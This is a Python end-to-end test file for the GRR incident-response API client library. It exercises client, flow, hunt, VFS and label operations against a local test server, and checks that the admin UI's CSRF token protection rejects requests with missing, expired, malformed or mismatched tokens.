from grr_api_client import root as grr_api_root
from grr_api_client import utils as grr_api_utils
from grr.gui import api_auth_manager
from grr.gui import api_call_router_with_approval_checks
from grr.gui import webauth
from grr.gui import wsgiapp
from grr.gui import wsgiapp_testlib
from grr.gui.root import api_root_router
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import utils
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import crypto as rdf_crypto
from grr.proto import jobs_pb2
from grr.proto.api import vfs_pb2
from grr.server import access_control
from grr.server import aff4
from grr.server import flow
from grr.server.aff4_objects import aff4_grr
from grr.server.aff4_objects import security
from grr.server.authorization import client_approval_auth
from grr.server.flows.general import processes
from grr.server.flows.general import processes_test
from grr.server.hunts import standard_test
from grr.server.output_plugins import csv_plugin
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import hunt_test_lib
from grr.test_lib import test_lib
class ApiSSLE2ETest(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSSLE2ETest, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=1)
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
self.config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": cert_path,
})
self.config_overrider.Start()
self.prev_environ = dict(os.environ)
os.environ["REQUESTS_CA_BUNDLE"] = cert_path
self.port = portpicker.PickUnusedPort()
self.thread = wsgiapp_testlib.ServerThread(self.port)
self.thread.StartAndWaitUntilServing()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
def tearDown(self):
super(ApiSSLE2ETest, self).tearDown()
self.config_overrider.Stop()
os.environ.clear()
os.environ.update(self.prev_environ)
self.thread.keep_running = False
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_urn = self.SetupClients(1)[0]
c = self.api.Client(client_id=client_urn.Basename()).Get()
self.assertEqual(c.client_id, client_urn.Basename())
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_urn = self.SetupClients(1)[0]
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
class ApiE2ETest(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
"""Base class for all API E2E tests."""
def setUp(self):
super(ApiE2ETest, self).setUp()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.port = ApiE2ETest.server_port
self.endpoint = "http://localhost:%s" % self.port
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
self.poll_stubber = utils.MultiStubber(
(grr_api_utils, "DEFAULT_POLL_INTERVAL", 0.1),
(grr_api_utils, "DEFAULT_POLL_TIMEOUT", 10))
self.poll_stubber.Start()
def tearDown(self):
super(ApiE2ETest, self).tearDown()
self.poll_stubber.Stop()
_api_set_up_lock = threading.RLock()
_api_set_up_done = False
@classmethod
def setUpClass(cls):
super(ApiE2ETest, cls).setUpClass()
with ApiE2ETest._api_set_up_lock:
if not ApiE2ETest._api_set_up_done:
# Set up HTTP server
port = portpicker.PickUnusedPort()
ApiE2ETest.server_port = port
logging.info("Picked free AdminUI port for HTTP %d.", port)
ApiE2ETest.trd = wsgiapp_testlib.ServerThread(port)
ApiE2ETest.trd.StartAndWaitUntilServing()
ApiE2ETest._api_set_up_done = True
class ApiClientLibFlowTest(ApiE2ETest):
"""Tests flows-related part of GRR Python API client library."""
def testSearchWithNoClients(self):
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testSearchClientsWith2Clients(self):
client_urns = sorted(self.SetupClients(2))
clients = sorted(
self.api.SearchClients(query="."), key=lambda c: c.client_id)
self.assertEqual(len(clients), 2)
for i in range(2):
self.assertEqual(clients[i].client_id, client_urns[i].Basename())
self.assertEqual(clients[i].data.urn, client_urns[i])
def testListFlowsFromClientRef(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
flows = list(self.api.Client(client_id=client_urn.Basename()).ListFlows())
self.assertEqual(len(flows), 1)
self.assertEqual(flows[0].client_id, client_urn.Basename())
self.assertEqual(flows[0].flow_id, flow_urn.Basename())
self.assertEqual(flows[0].data.urn, flow_urn)
def testListFlowsFromClientObject(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
client = self.api.Client(client_id=client_urn.Basename()).Get()
flows = list(client.ListFlows())
self.assertEqual(len(flows), 1)
self.assertEqual(flows[0].client_id, client_urn.Basename())
self.assertEqual(flows[0].flow_id, flow_urn.Basename())
self.assertEqual(flows[0].data.urn, flow_urn)
def testCreateFlowFromClientRef(self):
client_urn = self.SetupClients(1)[0]
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 0)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 1)
result_flow_obj = aff4.FACTORY.Open(result_flow.data.urn, token=self.token)
self.assertEqual(result_flow_obj.args, args)
def testCreateFlowFromClientObject(self):
client_urn = self.SetupClients(1)[0]
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 0)
client = self.api.Client(client_id=client_urn.Basename()).Get()
result_flow = client.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 1)
result_flow_obj = aff4.FACTORY.Open(result_flow.data.urn, token=self.token)
self.assertEqual(result_flow_obj.args, args)
def testListResultsForListProcessesFlow(self):
process = rdf_client.Process(
pid=2,
ppid=1,
cmdline=["cmd.exe"],
exe="c:\\windows\\cmd.exe",
ctime=long(1333718907.167083 * 1e6),
RSS_size=42)
client_urn = self.SetupClients(1)[0]
client_mock = processes_test.ListProcessesMock([process])
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
for _ in flow_test_lib.TestFlowHelper(
flow_urn, client_mock, client_id=client_urn, token=self.token):
pass
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename())
results = list(result_flow.ListResults())
self.assertEqual(len(results), 1)
self.assertEqual(process.AsPrimitiveProto(), results[0].payload)
def testWaitUntilDoneReturnsWhenFlowCompletes(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename()).Get()
self.assertEqual(result_flow.data.state, result_flow.data.RUNNING)
def ProcessFlow():
time.sleep(1)
client_mock = processes_test.ListProcessesMock([])
for _ in flow_test_lib.TestFlowHelper(
flow_urn, client_mock, client_id=client_urn, token=self.token):
pass
threading.Thread(target=ProcessFlow).start()
f = result_flow.WaitUntilDone()
self.assertEqual(f.data.state, f.data.TERMINATED)
def testWaitUntilDoneRaisesWhenFlowFails(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename()).Get()
def ProcessFlow():
time.sleep(1)
with aff4.FACTORY.Open(flow_urn, mode="rw", token=self.token) as fd:
fd.GetRunner().Error("")
threading.Thread(target=ProcessFlow).start()
with self.assertRaises(grr_api_errors.FlowFailedError):
result_flow.WaitUntilDone()
def testWaitUntilDoneRaisesWhenItTimesOut(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(
flow_urn.Basename()).Get()
with self.assertRaises(grr_api_errors.PollTimeoutError):
with utils.Stubber(grr_api_utils, "DEFAULT_POLL_TIMEOUT", 1):
result_flow.WaitUntilDone()
class ApiClientLibHuntTest(ApiE2ETest, standard_test.StandardHuntTestMixin):
"""Tests flows-related part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibHuntTest, self).setUp()
self.hunt_obj = self.CreateHunt()
def testListHunts(self):
hs = list(self.api.ListHunts())
self.assertEqual(len(hs), 1)
self.assertEqual(hs[0].hunt_id, self.hunt_obj.urn.Basename())
self.assertEqual(hs[0].data.name, "GenericHunt")
def testGetHunt(self):
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.hunt_id, self.hunt_obj.urn.Basename())
self.assertEqual(h.data.name, "GenericHunt")
def testModifyHunt(self):
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.client_limit, 100)
h = h.Modify(client_limit=200)
self.assertEqual(h.data.client_limit, 200)
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.client_limit, 200)
def testDeleteHunt(self):
self.api.Hunt(self.hunt_obj.urn.Basename()).Delete()
obj = aff4.FACTORY.Open(self.hunt_obj.urn, token=self.token)
self.assertEqual(obj.__class__, aff4.AFF4Volume)
def testStartHunt(self):
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.PAUSED)
h = h.Start()
self.assertEqual(h.data.state, h.data.STARTED)
h = self.api.Hunt(self.hunt_obj.urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.STARTED)
def testStopHunt(self):
hunt_urn = self.StartHunt()
h = self.api.Hunt(hunt_urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.STARTED)
h = h.Stop()
self.assertEqual(h.data.state, h.data.STOPPED)
h = self.api.Hunt(hunt_urn.Basename()).Get()
self.assertEqual(h.data.state, h.data.STOPPED)
def testListResults(self):
self.client_ids = self.SetupClients(5)
with test_lib.FakeTime(42):
hunt_urn = self.StartHunt()
self.AssignTasksToClients()
self.RunHunt(failrate=-1)
h = self.api.Hunt(hunt_urn.Basename()).Get()
results = list(h.ListResults())
client_ids = set(r.client.client_id for r in results)
self.assertEqual(client_ids, set(x.Basename() for x in self.client_ids))
for r in results:
self.assertEqual(r.timestamp, 42000000)
self.assertEqual(r.payload.pathspec.path, "/tmp/evil.txt")
def testListLogsWithoutClientIds(self):
self.hunt_obj.Log("Sample message: foo.")
self.hunt_obj.Log("Sample message: bar.")
logs = list(self.api.Hunt(self.hunt_obj.urn.Basename()).ListLogs())
self.assertEqual(len(logs), 2)
self.assertEqual(logs[0].client, None)
self.assertEqual(logs[0].data.log_message, "Sample message: foo.")
self.assertEqual(logs[1].client, None)
self.assertEqual(logs[1].data.log_message, "Sample message: bar.")
def testListLogsWithClientIds(self):
self.client_ids = self.SetupClients(2)
hunt_urn = self.StartHunt()
self.AssignTasksToClients()
self.RunHunt(failrate=-1)
logs = list(self.api.Hunt(hunt_urn.Basename()).ListLogs())
client_ids = set()
for l in logs:
client_ids.add(l.client.client_id)
self.assertEqual(client_ids, set(x.Basename() for x in self.client_ids))
def testListErrors(self):
client_urn_1 = rdf_client.ClientURN("C.0000111122223333")
with test_lib.FakeTime(52):
self.hunt_obj.LogClientError(client_urn_1, "Error foo.")
client_urn_2 = rdf_client.ClientURN("C.1111222233334444")
with test_lib.FakeTime(55):
self.hunt_obj.LogClientError(client_urn_2, "Error bar.",
"<some backtrace>")
errors = list(self.api.Hunt(self.hunt_obj.urn.Basename()).ListErrors())
self.assertEqual(len(errors), 2)
self.assertEqual(errors[0].log_message, "Error foo.")
self.assertEqual(errors[0].client.client_id, client_urn_1.Basename())
self.assertEqual(errors[0].backtrace, "")
self.assertEqual(errors[1].log_message, "Error bar.")
self.assertEqual(errors[1].client.client_id, client_urn_2.Basename())
self.assertEqual(errors[1].backtrace, "<some backtrace>")
def testListCrashes(self):
self.hunt_obj.Run()
client_ids = self.SetupClients(2)
client_mocks = dict([(client_id,
flow_test_lib.CrashClientMock(client_id, self.token))
for client_id in client_ids])
self.AssignTasksToClients(client_ids)
hunt_test_lib.TestHuntHelperWithMultipleMocks(client_mocks, False,
self.token)
crashes = list(self.api.Hunt(self.hunt_obj.urn.Basename()).ListCrashes())
self.assertEqual(len(crashes), 2)
self.assertEqual(
set(x.client.client_id for x in crashes),
set(x.Basename() for x in client_ids))
for c in crashes:
self.assertEqual(c.crash_message, "Client killed during transaction")
def testListClients(self):
self.hunt_obj.Run()
client_ids = self.SetupClients(5)
self.AssignTasksToClients(client_ids=client_ids)
self.RunHunt(client_ids=[client_ids[-1]], failrate=0)
h = self.api.Hunt(self.hunt_obj.urn.Basename())
clients = list(h.ListClients(h.CLIENT_STATUS_STARTED))
self.assertEqual(len(clients), 5)
clients = list(h.ListClients(h.CLIENT_STATUS_OUTSTANDING))
self.assertEqual(len(clients), 4)
clients = list(h.ListClients(h.CLIENT_STATUS_COMPLETED))
self.assertEqual(len(clients), 1)
self.assertEqual(clients[0].client_id, client_ids[-1].Basename())
def testGetClientCompletionStats(self):
self.hunt_obj.Run()
client_ids = self.SetupClients(5)
self.AssignTasksToClients(client_ids=client_ids)
client_stats = self.api.Hunt(
self.hunt_obj.urn.Basename()).GetClientCompletionStats()
self.assertEqual(len(client_stats.start_points), 0)
self.assertEqual(len(client_stats.complete_points), 0)
def testGetStats(self):
self.client_ids = self.SetupClients(5)
self.hunt_obj.Run()
self.AssignTasksToClients()
self.RunHunt(failrate=-1)
stats = self.api.Hunt(self.hunt_obj.urn.Basename()).GetStats()
self.assertEqual(len(stats.worst_performers), 5)
def testGetFilesArchive(self):
zip_stream = StringIO.StringIO()
self.api.Hunt(self.hunt_obj.urn.Basename()).GetFilesArchive().WriteToStream(
zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertTrue(namelist)
def testExportedResults(self):
zip_stream = StringIO.StringIO()
self.api.Hunt(self.hunt_obj.urn.Basename()).GetExportedResults(
csv_plugin.CSVInstantOutputPlugin.plugin_name).WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertTrue(namelist)
class ApiClientLibVfsTest(ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibVfsTest, self).setUp()
self.client_urn = self.SetupClients(1)[0]
fixture_test_lib.ClientFixture(self.client_urn, self.token)
def testGetFileFromRef(self):
file_ref = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
self.assertEqual(file_ref.path, "fs/os/c/Downloads/a.txt")
file_obj = file_ref.Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads/a.txt")
self.assertFalse(file_obj.is_directory)
self.assertEqual(file_obj.data.name, "a.txt")
def testGetFileForDirectory(self):
file_obj = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads").Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads")
self.assertTrue(file_obj.is_directory)
def testListFiles(self):
files_iter = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").ListFiles()
files_list = list(files_iter)
self.assertEqual(
sorted(f.data.name for f in files_list),
sorted(
[u"a.txt", u"b.txt", u"c.txt", u"d.txt", u"sub1", u"中国新闻网新闻中.txt"]))
def testGetBlob(self):
out = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetBlobUnicode(self):
aff4.FACTORY.Copy("aff4:/C.1000000000000000/fs/tsk/c/bin/bash",
"aff4:/C.1000000000000000/fs/tsk/c/bin/中国新闻网新闻中")
out = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
u"fs/tsk/c/bin/中国新闻网新闻中").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetFilesArchive(self):
zip_stream = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin").GetFilesArchive().WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertEqual(
sorted(namelist),
sorted([
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/rbash",
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/bash"
]))
def testGetVersionTimes(self):
vtimes = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").GetVersionTimes()
self.assertEqual(len(vtimes), 1)
def testRefresh(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").Refresh()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads")
operation = f.Refresh()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
for _ in flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token):
pass
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testCollect(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").Collect()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testCollectWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
for _ in flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token):
pass
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testGetTimeline(self):
timeline = self.api.Client(
client_id=self.client_urn.Basename()).File("fs").GetTimeline()
self.assertTrue(timeline)
for item in timeline:
self.assertTrue(isinstance(item, vfs_pb2.ApiVfsTimelineItem))
def testGetTimelineAsCsv(self):
out = StringIO.StringIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs").GetTimelineAsCsv().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiClientLibLabelsTest(ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibLabelsTest, self).setUp()
self.client_urn = self.SetupClients(1)[0]
def testAddLabels(self):
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(list(client_ref.Get().data.labels), [])
with test_lib.FakeTime(42):
client_ref.AddLabels(["foo", "bar"])
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
jobs_pb2.AFF4ObjectLabel(
name="bar", owner=self.token.username, timestamp=42000000),
jobs_pb2.AFF4ObjectLabel(
name="foo", owner=self.token.username, timestamp=42000000)
])
def testRemoveLabels(self):
with test_lib.FakeTime(42):
with aff4.FACTORY.Open(
self.client_urn,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabels(["bar", "foo"])
client_ref = self.api.Client(client_id=self.client_urn.Basename())
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
jobs_pb2.AFF4ObjectLabel(
name="bar", owner=self.token.username, timestamp=42000000),
jobs_pb2.AFF4ObjectLabel(
name="foo", owner=self.token.username, timestamp=42000000)
])
client_ref.RemoveLabel("foo")
self.assertEqual(
sorted(client_ref.Get().data.labels, key=lambda l: l.name), [
jobs_pb2.AFF4ObjectLabel(
name="bar", owner=self.token.username, timestamp=42000000)
])
class CSRFProtectionTest(ApiE2ETest):
"""Tests GRR's CSRF protection logic for the HTTP API."""
def setUp(self):
super(CSRFProtectionTest, self).setUp()
self.base_url = self.endpoint
def testGETRequestWithoutCSRFTokenAndRequestedWithHeaderSucceeds(self):
response = requests.get(self.base_url + "/api/config")
self.assertEquals(response.status_code, 200)
# Assert XSSI protection is in place.
self.assertEquals(response.text[:5], ")]}'\n")
def testHEADRequestForGETUrlWithoutTokenAndRequestedWithHeaderSucceeds(self):
response = requests.head(self.base_url + "/api/config")
self.assertEquals(response.status_code, 200)
def testHEADRequestNotEnabledForPOSTUrls(self):
response = requests.head(self.base_url + "/api/clients/labels/add")
self.assertEquals(response.status_code, 405)
def testHEADRequestNotEnabledForDeleteUrls(self):
response = requests.head(
self.base_url + "/api/users/me/notifications/pending/0")
self.assertEquals(response.status_code, 405)
def testPOSTRequestWithoutCSRFTokenFails(self):
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
response = requests.post(
self.base_url + "/api/clients/labels/add", data=json.dumps(data))
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPOSTRequestWithCSRFTokenInCookiesAndNotInHeadersFails(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPOSTRequestWithCSRFTokenInHeadersAndCookiesSucceeds(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 200)
def testPOSTRequestFailsIfCSRFTokenIsExpired(self):
with test_lib.FakeTime(rdfvalue.RDFDatetime().FromSecondsFromEpoch(42)):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 200)
# This should still succeed as we use strict check in wsgiapp.py:
# current_time - token_time > CSRF_TOKEN_DURATION.microseconds
with test_lib.FakeTime(rdfvalue.RDFDatetime().FromSecondsFromEpoch(42) +
wsgiapp.CSRF_TOKEN_DURATION.seconds):
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 200)
with test_lib.FakeTime(rdfvalue.RDFDatetime().FromSecondsFromEpoch(42) +
wsgiapp.CSRF_TOKEN_DURATION.seconds + 1):
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("Expired CSRF token" in response.text)
def testPOSTRequestFailsIfCSRFTokenIsMalformed(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token + "BLAH"}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("Malformed" in response.text)
def testPOSTRequestFailsIfCSRFTokenDoesNotMatch(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
data = {"client_ids": ["C.0000000000000000"], "labels": ["foo", "bar"]}
cookies = {"csrftoken": csrf_token}
# This changes the default test username, meaning that the encoded CSRF
# token and the token corresponding to the next request's user won't
# match.
webauth.WEBAUTH_MANAGER.SetUserName("someotheruser")
response = requests.post(
self.base_url + "/api/clients/labels/add",
headers=headers,
data=json.dumps(data),
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("Non-matching" in response.text)
def testDELETERequestWithoutCSRFTokenFails(self):
response = requests.delete(
self.base_url + "/api/users/me/notifications/pending/0")
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testDELETERequestWithCSRFTokenInCookiesAndNotInHeadersFails(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
cookies = {"csrftoken": csrf_token}
response = requests.delete(
self.base_url + "/api/users/me/notifications/pending/0",
cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testDELETERequestWithCSRFTokenInCookiesAndHeadersSucceeds(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
cookies = {"csrftoken": csrf_token}
response = requests.delete(
self.base_url + "/api/users/me/notifications/pending/0",
headers=headers,
cookies=cookies)
self.assertEquals(response.status_code, 200)
def testPATCHRequestWithoutCSRFTokenFails(self):
response = requests.patch(self.base_url + "/api/hunts/H:123456")
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPATCHRequestWithCSRFTokenInCookiesAndNotInHeadersFails(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
cookies = {"csrftoken": csrf_token}
response = requests.patch(
self.base_url + "/api/hunts/H:123456", cookies=cookies)
self.assertEquals(response.status_code, 403)
self.assertTrue("CSRF" in response.text)
def testPATCHRequestWithCSRFTokenInCookiesAndHeadersSucceeds(self):
# Fetch csrf token from the cookie set on the main page.
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
headers = {"x-csrftoken": csrf_token}
cookies = {"csrftoken": csrf_token}
response = requests.patch(
self.base_url + "/api/hunts/H:123456", headers=headers, cookies=cookies)
# We consider 404 to be a normal response here.
# Hunt H:123456 doesn't exist.
self.assertEquals(response.status_code, 404)
def testCSRFTokenIsUpdatedIfNotPresentInCookies(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
self.assertTrue(csrf_token)
# Check that calling the GetGrrUser method without a CSRF cookie in the
# request sets a fresh token.
get_user_response = requests.get(self.base_url + "/api/users/me")
csrf_token_2 = get_user_response.cookies.get("csrftoken")
self.assertTrue(csrf_token_2)
self.assertNotEqual(csrf_token, csrf_token_2)
def testCSRFTokenIsNotUpdatedIfUserIsUnknown(self):
fake_manager = webauth.NullWebAuthManager()
fake_manager.SetUserName("")
with utils.Stubber(webauth, "WEBAUTH_MANAGER", fake_manager):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
self.assertIsNone(csrf_token)
def testGetPendingUserNotificationCountMethodRefreshesCSRFToken(self):
index_response = requests.get(self.base_url)
csrf_token = index_response.cookies.get("csrftoken")
# Check that calling GetGrrUser method doesn't update the cookie.
get_user_response = requests.get(
self.base_url + "/api/users/me", cookies={
"csrftoken": csrf_token
})
csrf_token_2 = get_user_response.cookies.get("csrftoken")
self.assertIsNone(csrf_token_2)
# Check that calling GetPendingUserNotificationsCount refreshes the
# token.
notifications_response = requests.get(
self.base_url + "/api/users/me/notifications/pending/count",
cookies={
"csrftoken": csrf_token
})
csrf_token_3 = notifications_response.cookies.get("csrftoken")
self.assertTrue(csrf_token_3)
self.assertNotEqual(csrf_token, csrf_token_3)
class ApiClientLibApprovalsTest(ApiE2ETest,
standard_test.StandardHuntTestMixin):
def setUp(self):
super(ApiClientLibApprovalsTest, self).setUp()
cls = (api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks)
cls.ClearCache()
